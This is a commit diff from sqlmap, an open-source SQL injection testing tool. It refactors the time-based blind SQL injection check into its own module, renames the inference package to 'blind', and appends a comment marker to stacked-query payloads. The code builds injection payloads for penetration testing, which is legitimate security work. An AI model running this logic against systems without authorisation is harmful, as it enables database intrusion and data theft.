Properly moved and improved inject.goStacked() function and newly

implemented Time based blind SQL injection now is a single test file within the lib/techniques/ folder. Renamed lib/techniques/inference to lib/techniques/blind, it is more approriate and adapted the rest of the libraries. Updated ChangeLog file.
2026-01-06 22:59:02 +00:00 · 2008-11-12 23:44:09 +00:00
parent 9329f8c9c4
commit ecc4a98071
10 changed files with 63 additions and 31 deletions
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -31,6 +31,7 @@ from lib.core.data import kb
 from lib.core.dump import dumper
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.settings import SUPPORTED_DBMS
+from lib.techniques.blind.timebased import timeTest
 from lib.techniques.inband.union.test import unionTest


@@ -70,7 +71,7 @@ def action():

    # Techniques options
    if conf.timeTest:
-        dumper.string("time based sql injection", conf.dbmsHandler.timeTest())
+        dumper.string("time based blind sql injection payload", timeTest())

    if conf.unionTest:
        dumper.string("valid union", unionTest())
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -65,4 +65,4 @@ ORACLE_ALIASES    = [ "oracle", "orcl", "ora", "or" ]

 SUPPORTED_DBMS    = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES

-TIME_SECONDS      = 5
+TIME_DELAY        = 5
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -38,10 +38,10 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.data import temp
-from lib.core.settings import TIME_SECONDS
+from lib.core.settings import TIME_DELAY
 from lib.request.connect import Connect as Request
 from lib.techniques.inband.union.use import unionUse
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection
 from lib.utils.resume import queryOutputLength
 from lib.utils.resume import resume

@@ -388,8 +388,9 @@ def goStacked(expression, timeTest=False):
    TODO: write description
    """

+    comment        = queries[kb.dbms].comment
    query          = agent.prefixQuery("; %s" % expression)
-    query          = agent.postfixQuery(query)
+    query          = agent.postfixQuery("%s; %s" % (query, comment))
    payload        = agent.payload(newValue=query)

    start    = time.time()
@@ -397,6 +398,6 @@ def goStacked(expression, timeTest=False):
    duration = int(time.time() - start)

    if timeTest:
-        return (duration >= TIME_SECONDS, payload)
+        return (duration >= TIME_DELAY, payload)
    else:
-        return duration >= TIME_SECONDS
+        return duration >= TIME_DELAY
--- a/lib/techniques/inference/init.py
+++ b/lib/techniques/inference/init.py
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
--- a/lib/techniques/blind/timebased.py
+++ b/lib/techniques/blind/timebased.py
@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+
+
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.settings import TIME_DELAY
+from lib.request import inject
+
+
+def timeTest():
+    infoMsg  = "testing time based blind sql injection on parameter "
+    infoMsg += "'%s'" % kb.injParameter
+    logger.info(infoMsg)
+
+    query    = queries[kb.dbms].timedelay % TIME_DELAY
+    timeTest = inject.goStacked(query, timeTest=True)
+
+    if timeTest[0] == True:
+        return timeTest[1]
+    else:
+        return None
--- a/lib/utils/resume.py
+++ b/lib/utils/resume.py
@@ -32,7 +32,7 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.unescaper import unescaper
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection


 def queryOutputLength(expression, payload):